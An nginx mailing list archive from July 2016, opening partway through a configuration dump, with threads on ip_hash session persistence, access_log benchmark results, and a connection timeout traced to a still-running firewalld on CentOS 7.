ppt; application/vnd.wap.wmlc wmlc; application/vnd.google-earth.kml+xml kml; application/vnd.google-earth.kmz kmz; application/x-7z-compressed 7z; application/x-cocoa cco; application/x-java-archive-diff jardiff; application/x-java-jnlp-file jnlp; application/x-makeself run; application/x-perl pl pm; application/x-pilot prc pdb; application/x-rar-compressed rar; application/x-redhat-package-manager rpm; application/x-sea sea; application/x-shockwave-flash swf; application/x-stuffit sit; application/x-tcl tcl tk; application/x-x509-ca-cert der pem crt; application/x-xpinstall xpi; application/xhtml+xml xhtml; application/xspf+xml xspf; application/zip zip; application/octet-stream bin exe dll; application/octet-stream deb; application/octet-stream dmg; application/octet-stream iso img; application/octet-stream msi msp msm; application/vnd.openxmlformats-officedocument.wordprocessingml.document docx; application/vnd.openxmlformats-officedocument.spreadsheetml.sheet xlsx; application/vnd.openxmlformats-officedocument.presentationml.presentation pptx; audio/midi mid midi kar; audio/mpeg mp3; audio/ogg ogg; audio/x-m4a m4a; audio/x-realaudio ra; video/3gpp 3gpp 3gp; video/mp2t ts; video/mp4 mp4; video/mpeg mpeg mpg; video/quicktime mov; video/webm webm; video/x-flv flv; video/x-m4v m4v; video/x-mng mng; video/x-ms-asf asx asf; video/x-ms-wmv wmv; video/x-msvideo avi; } # configuration file /etc/nginx/sites-enabled/default: ## # You should look at the following URL's in order to grasp a solid understanding # of Nginx configuration files in order to fully unleash the power of Nginx. # http://wiki.nginx.org/Pitfalls # http://wiki.nginx.org/QuickStart # http://wiki.nginx.org/Configuration # # Generally, you will want to move this file somewhere, and start with a clean # file but keep this around for reference. Or just disable in sites-enabled. # # Please see /usr/share/doc/nginx-doc/examples/ for more detailed examples. 
## # Default server configuration # server { listen 80 default_server; listen [::]:80 default_server; # SSL configuration # # listen 443 ssl default_server; # listen [::]:443 ssl default_server; # # Note: You should disable gzip for SSL traffic. # See: https://bugs.debian.org/773332 # # Read up on ssl_ciphers to ensure a secure configuration. # See: https://bugs.debian.org/765782 # # Self signed certs generated by the ssl-cert package # Don't use them in a production server! # # include snippets/snakeoil.conf; root /var/www/html; # Add index.php to the list if you are using PHP index index.html index.htm index.nginx-debian.html; server_name _; location / { # First attempt to serve request as file, then # as directory, then fall back to displaying a 404. try_files $uri $uri/ =404; } # pass the PHP scripts to FastCGI server listening on 127.0.0.1:9000 # #location ~ \.php$ { # include snippets/fastcgi-php.conf; # # # With php7.0-cgi alone: # fastcgi_pass 127.0.0.1:9000; # # With php7.0-fpm: # fastcgi_pass unix:/var/run/php7.0-fpm.sock; #} # deny access to .htaccess files, if Apache's document root # concurs with nginx's one # #location ~ /\.ht { # deny all; #} } # Virtual Host configuration for example.com # # You can move that to a different file under sites-available/ and symlink that # to sites-enabled/ to enable it. 
# #server {
#	listen 80;
#	listen [::]:80;
#
#	server_name example.com;
#
#	root /var/www/example.com;
#	index index.html;
#
#	location / {
#		try_files $uri $uri/ =404;
#	}
#}

Posted at Nginx Forum: https://forum.nginx.org/read.php?2,268609,268609#msg-268609

From project722 at gmail.com Thu Jul 28 14:32:18 2016
From: project722 at gmail.com (Brian Pugh)
Date: Thu, 28 Jul 2016 09:32:18 -0500
Subject: session persistance with IP hash
In-Reply-To: 
References: <626BF73250B044D9A86AF45BDF189BDF@MezhRoze> <3368E24E387D4CC59744FF753E7B7EB2@MezhRoze>
Message-ID: 

Yesterday once I got the traffic going to the backend servers from nginx I
noticed that I was pinned to "backend3", which is last in the order. And
since I am the one setting this up I am the only user. So I changed up my
order just to see the effects of calculating a new hash. Instead of:

upstream backend {
backend1
backend2
backend3
}

I listed them in the order:

upstream backend {
backend2
backend3
backend1
}

then restarted nginx. At that point my traffic was pinned to backend1.
This seems a bit odd to me in that it seems to be always choosing the last
server in the order. Any thoughts on what might be happening and why it did
not pin me to backend1 the first time and backend2 the second time?

On Wed, Jul 27, 2016 at 8:44 PM, Robert Paprocki <
rpaprocki at fearnothingproductions.net> wrote:

>> I'm not as concerned with what server it's routed to as much as I am
>> concerned with the client session "sticking" to the server it was routed
>> to. And I really do not know enough about how to use cookie based hashing.
>> In order to have cookie based hashing would the cookie need to be common
>> among all pages at the target URL in order to stick the session to a
>> particular server for the duration of that session?
>>
>
> Assuming you're using a cookie to track the session, the cookie shouldn't
> change depending on what URI the user is accessing.
>
>> (And, I assume cookie based hashing is not like ip hash in that you are
>> only stuck to a particular server for the duration of that browser session?)
>>
>
> Depends on how long the cookie lives on the browser. If the cookie never
> changes and doesn't expire when the browser closes, the backend wouldn't
> change (again, assuming nothing changed about the backend servers).
>
> It doesn't matter what is used to build the hash key - cookie, ip,
> whatever. As long as that value doesn't change, and nothing changes about
> your backends, the client will hit the same backend every time. Guaranteed.
>
>> Also, what is the logic behind "round-robin" or is that the same as
>> ip_hash? For instance, if I have a client at 192.168.100.10 that's assigned
>> to backend 3, then 100 more clients come along on the same subnet, they
>> will all land on backend 3. Next client 192.168.200.10 comes along, what
>> determines whether it lands on backend1 or backend2? Or, is there a chance
>> it could also land on backend3?
>>
>
> Round robin means that each backend will be used in turn, regardless of
> the client. For example, if you have 3 backends:
>
> request 1 -> backend1
> request 2 -> backend2
> request 3 -> backend3
> request 4 -> backend1
> request 5 -> backend2
>
> This goes on forever, regardless of the client IP. (Of course, this is
> relative if you are using server weights - see the example at
> http://nginx.org/en/docs/http/ngx_http_upstream_module.html#upstream for
> a round robin example with weights). If you want session persistence, then
> round robin balancing is not for you.
>
> _______________________________________________
> nginx mailing list
> nginx at nginx.org
> http://mailman.nginx.org/mailman/listinfo/nginx
>
-------------- next part --------------
An HTML attachment was scrubbed...
URL: 

From mdounin at mdounin.ru Thu Jul 28 15:21:35 2016
From: mdounin at mdounin.ru (Maxim Dounin)
Date: Thu, 28 Jul 2016 18:21:35 +0300
Subject: Access_log off impact on Requests/sec
In-Reply-To: <0fbcdb783d9117b1faade44918ba7612.NginxMailingListEnglish@forum.nginx.org>
References: <0fbcdb783d9117b1faade44918ba7612.NginxMailingListEnglish@forum.nginx.org>
Message-ID: <20160728152135.GU57459@mdounin.ru>

Hello!

On Thu, Jul 28, 2016 at 10:32:13AM -0400, stevewin wrote:

> I am beginning to look at NGINX performance on a development system with
> traffic driven by Wrk. Initially I am just looking at static HTTP serving.
>
> I am using NGINX v1.10.1 running on the host system with Ubuntu 16.04. Wrk
> v4.0.4 is running from a separate client platform over a private 40GB
> connection. The CPU on the host system has 24 cores (no hyperthreading).
>
> I had started to look into various NGINX and kernel parameters for
> performance optimization. One thing that I am seeing that appears odd to me
> is that when I change access_log to off (from the default of specifying a
> log location) it seems to decrease the requests/sec that I am seeing when
> connections increase (using defaults with everything else being equal).
> Does this make sense?
>
> The results with defaults including "access_log /var/log/nginx/access.log;"
> show the Requests/sec ramping up to ~24.5K and staying there.
>
> The results with defaults and access_log changed to "access_log off;" show
> the Requests/sec initially ramping up to ~28.5K but then decreasing down to
> ~20K and staying there.
>
> The NGINX config is at the bottom.
>
> Can someone explain possible reasons for this behavior?

Benchmarking with a small number of connections and multiple worker
processes is known to be seriously affected by non-uniform distribution of
connections between worker processes.
And various minor changes like switching off logs may cause unexpected
results similar to what you observe - because they change the distribution
of connections between worker processes, and this in turn changes things
dramatically.

Some things to try if you want to get more accurate results:

- Switch off the accept mutex, http://nginx.org/r/accept_mutex. It is off
by default since nginx 1.11.3, but you are using an older version.

- Try using "listen ... reuseport", http://nginx.org/r/listen. It has
various unwanted side effects and I wouldn't recommend using it without a
good reason, but it will ensure uniform distribution of connections between
workers and will give you a good idea of how many requests your system can
really handle in a particular configuration.

Note well that there are various system and configuration limits that need
tuning as well, including the number of worker connections in nginx, the
listen backlog, and the number of local TCP ports available on the client
side. The timeouts seen in your wrk results indicate that you are likely
hitting at least some of them.

-- 
Maxim Dounin
http://nginx.org/

From r at roze.lv Thu Jul 28 15:33:40 2016
From: r at roze.lv (Reinis Rozitis)
Date: Thu, 28 Jul 2016 18:33:40 +0300
Subject: Access_log off impact on Requests/sec
In-Reply-To: <0fbcdb783d9117b1faade44918ba7612.NginxMailingListEnglish@forum.nginx.org>
References: <0fbcdb783d9117b1faade44918ba7612.NginxMailingListEnglish@forum.nginx.org>
Message-ID: <146C468554894261B4FF293B9C93034D@MezhRoze>

> The results with defaults including "access_log /var/log/nginx/access.log;"
> show the Requests/sec ramping up to ~24.5K and staying there.
> The results with defaults and access_log changed to "access_log off;" show
> the Requests/sec initially ramping up to ~28.5K but then decreasing down to
> ~20K and staying there.
> The NGINX config is at the bottom.
> Can someone explain possible reasons for this behavior?
First of all you should probably format your benchmark results in a more
readable format (a table or something), as looking at them now is
counterintuitive (also, it's better to keep the configuration at a minimum;
no need for default config files like mime.types etc).

Second - against what exactly are you testing?

As your benchmark numbers looked odd (and somewhat low), out of interest I
did a few tests against a bare 1.10.3 nginx (the default index.htm page) on
a server with 12 cores - nginx runs 8 workers. I took your heaviest test,
-t32 -c1000 -d1m (32 threads and 1000 connections).

Without access_log:

Running 1m test @ http:///
  32 threads and 1000 connections
  Thread Stats   Avg      Stdev     Max   +/- Stdev
    Latency    65.40ms  140.79ms   1.96s    92.52%
    Req/Sec     4.06k     1.34k   25.27k    75.02%
  7746479 requests in 1.00m, 6.13GB read
Requests/sec: 128893.40
Transfer/sec:    104.48MB

With access_log:

  32 threads and 1000 connections
  Thread Stats   Avg      Stdev     Max   +/- Stdev
    Latency    84.17ms  193.73ms   2.00s    92.17%
    Req/Sec     4.05k     1.48k   36.23k    74.44%
  7724438 requests in 1.00m, 6.11GB read
Requests/sec: 128526.82
Transfer/sec:    104.18MB

And I'm basically limited by the 1Gbit network between the servers (I'll
try to test on some higher-core machine later so there is one nginx worker
for each wrk thread, and/or run on the same box against 'lo'), but I
couldn't replicate any significant difference with the log on or off.

rr

From rpaprocki at fearnothingproductions.net Thu Jul 28 16:07:00 2016
From: rpaprocki at fearnothingproductions.net (Robert Paprocki)
Date: Thu, 28 Jul 2016 09:07:00 -0700
Subject: session persistance with IP hash
In-Reply-To: 
References: <626BF73250B044D9A86AF45BDF189BDF@MezhRoze> <3368E24E387D4CC59744FF753E7B7EB2@MezhRoze>
Message-ID: 

Hello,

On Thu, Jul 28, 2016 at 7:32 AM, Brian Pugh wrote:

> Yesterday once I got the traffic going to the backend servers from nginx I
> noticed that I was pinned to "backend3", which is last in the order.
And
> since I am the one setting this up I am the only user. So I changed up my
> order just to see the effects of calculating a new hash. Instead of:
>
> upstream backend {
> backend1
> backend2
> backend3
> }
>
> I listed them in the order:
>
> upstream backend {
> backend2
> backend3
> backend1
> }
>
> then restarted nginx. At that point my traffic was pinned to backend1.
> This seems a bit odd to me in that it seems to be always choosing the last
> server in the order. Any thoughts on what might be happening and why it did
> not pin me to backend1 the first time and backend2 the second time?

This sounds exactly like what should be expected. To better understand,
let's look at a simple example of how hash-based selection _might_ occur (I
say "might" because this is not exactly how Nginx performs its hashing; I'm
simplifying for example's sake, but it's good enough). We'll make a few
assumptions:

- The hash key in this example is your IP address (we'll use 127.0.0.1 for
simplicity)
- We will assume each backend has the same weight
- Arrays are zero indexed
- Our upstream block looks like such:
upstream backend {
backend1
backend2
backend3
}
- We will kindly remember this is a conceptual example and not how Nginx
does things under the hood (but this is clear enough)

Let's say that the whole upstream definition creates an array of servers,
so in your first example you'd have an array of:

upstreams = { "backend1", "backend2", "backend3" }

The key "127.0.0.1" is run through a mathematical hash function to create
an integer, and it will create the same integer every single time it's run.
For our example, let's say that hash("127.0.0.1") equals the number 438653.
In order to select which backend to use, we compute our hash value 438653,
modulo the number of backends we have in our upstream (which is essentially
the remainder after division). So,

438653 % 3 = 2

So we get index 2 from our array.
Remember that our conceptual array is
zero-indexed, so we select upstreams[2], or the third element in our array,
which is "backend3". Every time a backend is selected for the key
"127.0.0.1", "backend3" will be used, because that's the result of looking
up upstreams[2]. Now, let's change the upstream block to such:

upstream backend {
backend2
backend3
backend1
}

Assuming nothing else has changed, we run through the same process again.
hash("127.0.0.1") is 438653, and 438653 % 3 is still 2. So, we look up
upstreams[2] (the third element in our array, same as last time), and we
get "backend1". Given this upstream configuration, we will get the same
result every time. In this example, the order we define backends matters,
and this can be used to explain your results perfectly. You shouldn't
expect that your key will be hashed to the first backend in your upstream
block; you should only expect that the same key will produce the same
_relative_ result every time it is hashed.

(And again to note, Nginx does do things slightly differently; rr peers
are defined as a linked list, not an array, and lookup is not strictly
hashval % list length; this is a conceptual example _only_)

-------------- next part --------------
An HTML attachment was scrubbed...
URL: 

From project722 at gmail.com Thu Jul 28 16:41:11 2016
From: project722 at gmail.com (Brian Pugh)
Date: Thu, 28 Jul 2016 11:41:11 -0500
Subject: session persistance with IP hash
In-Reply-To: 
References: <626BF73250B044D9A86AF45BDF189BDF@MezhRoze> <3368E24E387D4CC59744FF753E7B7EB2@MezhRoze>
Message-ID: 

Very thorough and detailed explanation, even if it was "simplified". Both
you and Reinis have been a tremendous help.
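[Editor's note] The modulo-selection model described in the reply above can be sketched in a few lines of code. This is only an illustration of the simplified model (hash of the key, modulo the number of servers); the `pick_backend` helper and the CRC32 hash are hypothetical stand-ins, not nginx's real ip_hash implementation:

```python
# Conceptual sketch of hash-based upstream selection: hash(key) % count.
# zlib.crc32 is an illustrative stand-in hash; nginx's actual ip_hash
# and its rr peer list work differently.
import zlib

def pick_backend(key, upstreams):
    """Deterministically map a client key (e.g. an IP) to one upstream."""
    h = zlib.crc32(key.encode())
    return upstreams[h % len(upstreams)]

order_a = ["backend1", "backend2", "backend3"]
order_b = ["backend2", "backend3", "backend1"]

# The same key always lands on the same *slot*; reordering the upstream
# block changes which server occupies that slot, which is exactly the
# behavior Brian observed after reordering and restarting nginx.
print(pick_backend("127.0.0.1", order_a))
print(pick_backend("127.0.0.1", order_b))
```

Running it shows the two lists yield different server names for the same key, even though the selected index is identical.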
On Thu, Jul 28, 2016 at 11:07 AM, Robert Paprocki < rpaprocki at fearnothingproductions.net> wrote: > Hello, > > On Thu, Jul 28, 2016 at 7:32 AM, Brian Pugh wrote: > >> Yesterday once I got the traffic going to the backend servers from nginx >> I noticed that I was pinned to "backend3", which is last in the order. And >> since I am the one setting this up I am the only user. So I changed up my >> order just to see the effects of calculating a new hash. Instead of: >> >> upstream backend { >> backend1 >> backend2 >> backend3 >> } >> >> I listed them in the order: >> >> upstream backend { >> backend2 >> backend3 >> backend1 >> } >> >> then restarted nginx. At that point my traffic was pinned to backend1. >> This seems a bit odd to me in that it seems to be always choosing the last >> server in the order. Any thoughts on what might be happening and why it did >> not pin me to backend1 the first time and backend2 the second time? >> > > This sounds exactly like what should be expected. To better understand, > let's look at a simple example of how hash-based selection _might_ occur (I > say "might" because this is not exactly how Nginx performs its hashing, I'm > simplifying for examples' sake, but it's good enough). 
We'll make a few > assumptions: > > - The hash key in this example is your IP address (we'll use 127.0.0.1 for > simplicity) > - We will assume each backend has the same weight > - Arrays are zero indexed > - Our upstream block looks like such: > upstream backend { > backend1 > backend2 > backend3 > } > - We will kindly remember this is a conceptual example and not how Nginx > does things under the hood (but this is clear enough) > > Let's say that the whole upstream definition creates an array of servers, > so in your first example you'd have an array of: > > upstreams = { "backend1", "backend2", "backend3" } > > The key "127.0.0.1" is run through a mathematical hash function to create > an integer, and it will create the same integer every single time its run. > For our example, let's say that hash("127.0.0.1") equals the number 438653. > In order to select which backend to use, we compute our hash value 438652, > modulo the number of backends we have in our upstream (is essentially the > remainder after division). So, > > 438653 % 3 = 2 > > So we get index 2 from our array. Remember that our conceptual array is > zero-indexed, so we select upstreams[2], or the third element in our array, > which is "backend3". Every time a backend is selected for the key > "127.0.0.1", "backend3" will be used. because that's the result of looking > up upstreams[2]. Now, let's change the upstream block to such: > > upstream backend { > backend2 > backend3 > backend1 > } > > Assuming nothing else has changed, we run through the same process again. > hash("127.0.0.1") is 438653, and 438653 % 3 is still 2. So, we look up > upstreams[2] (the third element in our array, same as last time), and we > get "backend1". Given this upstream configuration, we will get the same > result every time. In this example, the order we define backends matters, > and this can be used to explain your results perfectly. 
You shouldn't > expect that your key will be hashed to the first backend in your upstream > block, you should only expect that the same key will produce the same > _relative_ result every time it is hashed. > > (And again to note, Nginx does do things slightly differently, rr peers > are defined as a linked list, not an array, and lookup is not strictly > hashval % list length; this is a conceptual example _only_) > > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx > -------------- next part -------------- An HTML attachment was scrubbed... URL: From larry.martell at gmail.com Thu Jul 28 19:01:17 2016 From: larry.martell at gmail.com (Larry Martell) Date: Thu, 28 Jul 2016 15:01:17 -0400 Subject: listening but not connecting Message-ID: Trying to set up nginx and uwsgi for django. Following the directions here: https://www.digitalocean.com/community/tutorials/how-to-serve-django-applications-with-uwsgi-and-nginx-on-centos-7 netstat shows that nginx is listening on port 80: tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN 9256/nginx: master But I cannot connect from my browser (I get connection timeout): This is my nginx.conf file: worker_processes 1; events { worker_connections 1024; } http { include mime.types; default_type application/octet-stream; keepalive_timeout 65; sendfile on; client_max_body_size 20M; include /etc/nginx/sites-enabled/*; } In /etc/nginx/sites-enabled I have this one file: # motor_nginx.conf # the upstream component nginx needs to connect to upstream django { server unix:///usr/local/motor/motor.sock; # for a file socket } # configuration of the server server { # the port your site will be served on listen 80; # the domain name it will serve for server_name localhost; charset utf-8; # max upload size client_max_body_size 75M; # adjust to taste # Django media location /media { alias /usr/local/motor/motor/media; } location /static { alias 
/usr/local/motor/motor/static; } # Finally, send all non-media requests to the Django server. location / { uwsgi_pass django; include /usr/local/motor/motor/uwsgi_params; } } The error log has just this one line: 2016/07/28 14:26:41 [notice] 8737#0: signal process started And there is nothing in the access.log. Any ideas what I could be missing or what i should check? From pratyush at hostindya.com Thu Jul 28 19:43:18 2016 From: pratyush at hostindya.com (Pratyush Kumar) Date: Fri, 29 Jul 2016 01:13:18 +0530 Subject: listening but not connecting In-Reply-To: Message-ID: <176655ed-8302-436c-9d7c-e9f1cbab77e7@email.android.com> An HTML attachment was scrubbed... URL: From larry.martell at gmail.com Thu Jul 28 19:49:15 2016 From: larry.martell at gmail.com (Larry Martell) Date: Thu, 28 Jul 2016 15:49:15 -0400 Subject: listening but not connecting In-Reply-To: <176655ed-8302-436c-9d7c-e9f1cbab77e7@email.android.com> References: <176655ed-8302-436c-9d7c-e9f1cbab77e7@email.android.com> Message-ID: On Thursday, July 28, 2016, Pratyush Kumar wrote: > Can you please share the address which you are using in browser. > > According to the config which you shared, you will get a response only if > you use localhost as URL in browser > I am connecting from the outside to the public IP of the machine. What should I put in the config? It's listening on 0.0.0.0 so I thought that would work for any address. -------------- next part -------------- An HTML attachment was scrubbed... 
URL: 

From francis at daoine.org Thu Jul 28 19:52:40 2016
From: francis at daoine.org (Francis Daly)
Date: Thu, 28 Jul 2016 20:52:40 +0100
Subject: listening but not connecting
In-Reply-To: 
References: 
Message-ID: <20160728195240.GC12280@daoine.org>

On Thu, Jul 28, 2016 at 03:01:17PM -0400, Larry Martell wrote:

Hi there,

> netstat shows that nginx is listening on port 80:
>
> tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN 9256/nginx: master
>
> But I cannot connect from my browser (I get connection timeout):

> The error log has just this one line:
>
> 2016/07/28 14:26:41 [notice] 8737#0: signal process started
>
> And there is nothing in the access.log.
>
> Any ideas what I could be missing or what i should check?

nginx is seeing no traffic. So look at everything outside of nginx.

Does the hostname you use resolve to the nginx IP address?

Do you have a working network route to and from the nginx server?

Is there a firewall or network control device anywhere in between that is
dropping the traffic?

>From the nginx server, does "curl -v http://127.0.0.1/" or "curl -v
http://127.0.0.1/static/" give any useful response, or output in the log
files? If so, you know that nginx is active.

Does "tcpdump" on the nginx server show any incoming port-80 traffic?

Good luck with it,

f
-- 
Francis Daly        francis at daoine.org

From r at roze.lv Thu Jul 28 20:01:54 2016
From: r at roze.lv (Reinis Rozitis)
Date: Thu, 28 Jul 2016 23:01:54 +0300
Subject: listening but not connecting
In-Reply-To: 
References: 
Message-ID: 

> But I cannot connect from my browser (I get connection timeout):

Is there a firewall on the server (if yes - is port 80 open?).
rr

From nginx-forum at forum.nginx.org Thu Jul 28 20:19:24 2016
From: nginx-forum at forum.nginx.org (stevewin)
Date: Thu, 28 Jul 2016 16:19:24 -0400
Subject: Access_log off impact on Requests/sec
In-Reply-To: <20160728152135.GU57459@mdounin.ru>
References: <20160728152135.GU57459@mdounin.ru>
Message-ID: <56719e912bfe2cd8a85e149b19067e9b.NginxMailingListEnglish@forum.nginx.org>

Thanks Maxim. Setting either 'accept_mutex off;' or reuseport on the listen
directive doesn't seem to change the general trend much (apologies for the
formatting below, but I can't seem to find a way to paste data elegantly in
this forum).

In the data below the columns are: wrk threads, connections, then the four
configurations - "Default config", "access_log off;", "access_log off; +
accept_mutex off;" and "access_log off; + listen ... reuseport".

Requests/sec:

Thr  Conn   Default    log off    +mutex off  +reuseport
8    8      19352.37   22290.17   23944.48    23448.55
16   16     24839.12   28408.74   26976.59    27545.21
16   24     24845.17   28479.84   27039.90    27631.32
16   32     24633.34   25373.32   22097.93    25792.31
16   48     24540.14   21701.73   19953.71    23836.73
16   72     24620.15   19669.01   19285.64    20222.72
16   96     24591.50   19616.52   19646.13    19669.74
16   120    24569.45   19815.90   19752.29    19818.98
16   200    24642.54   20001.03   19981.29    19974.83
16   300    24161.27   20185.21   20376.75    20381.96
16   400    24607.07   20526.47   20743.34    20459.76
16   500    24712.25   20626.14   21016.65    20927.98
16   1000   24597.04   21137.30   21377.55    21032.03

Average Latency:

Thr  Conn   Default    log off    +mutex off  +reuseport
8    8      0.87ms     774.84us   348.81us    580.52us
16   16     1.61ms     1.31ms     679.01us    2.14ms
16   24     1.25ms     1.06ms     642.36us    1.52ms
16   32     3.94ms     3.23ms     1.93ms      10.26ms
16   48     8.71ms     5.00ms     3.25ms      26.24ms
16   72     17.21ms    5.37ms     3.95ms      7.53ms
16   96     36.09ms    9.79ms     8.49ms      8.05ms
16   120    44.31ms    12.13ms    9.82ms      9.82ms
16   200    108.02ms   22.18ms    21.58ms     19.26ms
16   300    112.68ms   36.75ms    39.94ms     35.11ms
16   400    94.84ms    58.44ms    60.78ms     53.03ms
16   500    82.97ms    78.26ms    65.91ms     71.37ms
16   1000   50.99ms    164.28ms   156.12ms    165.86ms

Socket errors:

Thr  Conn   Default               log off      +mutex off   +reuseport
8    8      none                  none         none         none
16   16     none                  none         none         none
16   24     none                  none         none         none
16   32     none                  none         none         none
16   48     none                  none         none         none
16   72     none                  none         none         none
16   96     none                  none         none         none
16   120    none                  none         none         none
16   200    none                  none         none         none
16   300    timeout 35            none         none         none
16   400    read 14, timeout 44   none         none         none
16   500    read 37, timeout 111  none         none         timeout 57
16   1000   timeout 189           timeout 473  timeout 629  timeout 1162

I had been experimenting with various tuning parameters for both NGINX and
Linux, including:

NGINX: worker_connections, access_log, worker_rlimit_nofile, multi_accept,
keepalive_requests
Linux: somaxconn, tcp_max_tw_buckets, netdev_max_backlog,
tcp_max_syn_backlog, ip_local_port_range, tcp_fin_timeout, tcp_tw_recycle,
tcp_tw_reuse, wmem_max, tcp_rmem, tcp_wmem

When I was getting undesired results with 'optimizations' I started backing
off the various tunings above - for some reason turning the access log off
seems to be the main perpetrator, for reasons I don't understand.

On the client side I'm running on a machine with an Intel(R) Xeon(R) CPU
E3-1241 v3 @ 3.50GHz (4 cores / 8 threads). I've repeated the runs with
both 8 and 32 wrk threads with a similar trend using access_log off;

Posted at Nginx Forum: https://forum.nginx.org/read.php?2,268609,268622#msg-268622

From nginx-forum at forum.nginx.org Thu Jul 28 20:22:28 2016
From: nginx-forum at forum.nginx.org (stevewin)
Date: Thu, 28 Jul 2016 16:22:28 -0400
Subject: Access_log off impact on Requests/sec
In-Reply-To: <146C468554894261B4FF293B9C93034D@MezhRoze>
References: <146C468554894261B4FF293B9C93034D@MezhRoze>
Message-ID: 

Thanks Reinis. The system is an ARM-based server development platform.
The chip is essentially a Pass 1 prototype (with known limitations) - not a
production part.

Posted at Nginx Forum: https://forum.nginx.org/read.php?2,268609,268623#msg-268623

From larry.martell at gmail.com Fri Jul 29 02:13:30 2016
From: larry.martell at gmail.com (Larry Martell)
Date: Thu, 28 Jul 2016 22:13:30 -0400
Subject: listening but not connecting
In-Reply-To: <20160728195240.GC12280@daoine.org>
References: <20160728195240.GC12280@daoine.org>
Message-ID: 

On Thu, Jul 28, 2016 at 3:52 PM, Francis Daly wrote:
> On Thu, Jul 28, 2016 at 03:01:17PM -0400, Larry Martell wrote:
>
> Hi there,
>
>> netstat shows that nginx is listening on port 80:
>>
>> tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN 9256/nginx: master
>>
>> But I cannot connect from my browser (I get connection timeout):
>
>> The error log has just this one line:
>>
>> 2016/07/28 14:26:41 [notice] 8737#0: signal process started
>>
>> And there is nothing in the access.log.
>>
>> Any ideas what I could be missing or what i should check?
>
> nginx is seeing no traffic.
>
> So look at everything outside of nginx.
>
> Does the hostname you use resolve to the nginx IP address?

>From my browser I am connecting to it with an IP address.

> Do you have a working network route to and from the nginx server?

Yes, I can ping it from the host I am trying to connect from.

> Is there a firewall or network control device anywhere in between that is
> dropping the traffic?

There was the out of the box firewall, and first I made sure port 80 was
open (firewall-cmd --zone=public --add-port=80/tcp --permanent) and then I
totally disabled the firewall (systemctl disable firewalld). I also
disabled selinux.

> From the nginx server, does "curl -v http://127.0.0.1/"

That returns the django login page, which is what I would expect.

> or "curl -v http://127.0.0.1/static/"

That gives a 403 forbidden.

> give any useful response, or output in the log files?
For that request the nginx error log has: [error] 9257#0: *21 directory index of "/usr/local/motor/motor/static/" is forbidden, client: 127.0.0.1, server: localhost, request: "GET /static/ HTTP/1.1", host: "127.0.0.1" > If so, you know that nginx is active. > > Does "tcpdump" on the nginx server show any incoming port-80 traffic? I am trying to connect from 173 and the nginx host is 152. When I try to connect from the browser, tcpdump shows messages like this: IP xx.xx.xx.173.58265 > xx.xx.xx.152.http: Flags [S], seq 2911544323, win 5840, options [mss 1460,sackOK,TS val 442582882 ecr 0,nop,wscale 2,unknown-76 0x01019887a79a0005,unknown-76 0x0c05,nop,eol], length 0 IP xx.xx.xx.152 > xx.xx.xx.173: ICMP host 10.188.36.152 unreachable - admin prohibited, length 84 > Good luck with it, Thanks. I need more than luck ;-) From francis at daoine.org Fri Jul 29 07:58:11 2016 From: francis at daoine.org (Francis Daly) Date: Fri, 29 Jul 2016 08:58:11 +0100 Subject: listening but not connecting In-Reply-To: References: <20160728195240.GC12280@daoine.org> Message-ID: <20160729075811.GD12280@daoine.org> On Thu, Jul 28, 2016 at 10:13:30PM -0400, Larry Martell wrote: > On Thu, Jul 28, 2016 at 3:52 PM, Francis Daly wrote: > > On Thu, Jul 28, 2016 at 03:01:17PM -0400, Larry Martell wrote: Hi there, > > From the nginx server, does "curl -v http://127.0.0.1/" > > That returns the django login page, which is what I would expect. That much is all good. > For that request nginx error log has: > > [error] 9257#0: *21 directory index of > "/usr/local/motor/motor/static/" is forbidden, client: 127.0.0.1, > server: localhost, request: "GET /static/ HTTP/1.1", host: "127.0.0.1" That's also good. > > Does "tcpdump" on the nginx server show any incoming port-80 traffic? > > I am trying to connect from 173 and the nginx host is 152.
> When I try and connect from the browser tcpdump shows messages like this: > > IP xx.xx.xx.173.58265 > xx.xx.xx.152.http: Flags [S], seq 2911544323, > win 5840, options [mss 1460,sackOK,TS val 442582882 ecr 0,nop,wscale > 2,unknown-76 0x01019887a79a0005,unknown-76 0x0c05,nop,eol], length 0 > IP xx.xx.xx.152 > xx.xx.xx.173: ICMP host 10.188.36.152 unreachable - > admin prohibited, length 84 That says that the incoming traffic does get to xx.xx.xx.152, but that machine says that 10.188.36.152 is not accessible. Assuming that those two .152 numbers are your nginx server, something on it (that is not nginx) is blocking the traffic. Does "iptables -L -v -n" show anything interesting? You said that you disabled the firewall, so it probably is empty. Is there more than one network interface on the nginx server, and do you have reverse-path filtering (rp_filter) enabled on this interface? I think that can lead to the same signs. Otherwise, you get to learn more about the security aspects of your operating system :-( Cheers, f -- Francis Daly francis at daoine.org From larry.martell at gmail.com Fri Jul 29 11:18:12 2016 From: larry.martell at gmail.com (Larry Martell) Date: Fri, 29 Jul 2016 07:18:12 -0400 Subject: listening but not connecting In-Reply-To: <20160729075811.GD12280@daoine.org> References: <20160728195240.GC12280@daoine.org> <20160729075811.GD12280@daoine.org> Message-ID: On Fri, Jul 29, 2016 at 3:58 AM, Francis Daly wrote: > On Thu, Jul 28, 2016 at 10:13:30PM -0400, Larry Martell wrote: > Does "iptables -L -v -n" show anything interesting? You said that you > disabled the firewall, so it probably is empty. I am on CentOS 7, which uses firewalld, not iptables. I had disabled it with "systemctl disable firewalld" but apparently that does not actually disable it. I did "systemctl stop firewalld" and then everything started to work. Thank you very much for all your help.
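For anyone who hits the same thing: on systemd-based distributions such as CentOS 7, "disable" and "stop" are independent operations. A short sketch of the commands involved (to be run as root on the nginx host):

```shell
# "disable" only removes firewalld from the boot sequence;
# an already-running firewalld keeps filtering packets.
systemctl disable firewalld

# "stop" halts the running daemon, taking effect immediately.
systemctl stop firewalld

# Verify both states:
systemctl is-active firewalld    # "inactive" once stopped
systemctl is-enabled firewalld   # "disabled" once disabled
```

A related gotcha with the earlier attempt to open port 80: "firewall-cmd --permanent" changes only the saved configuration and does not take effect on the running firewall until "firewall-cmd --reload" is run, so disabling the firewall entirely was never strictly necessary.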
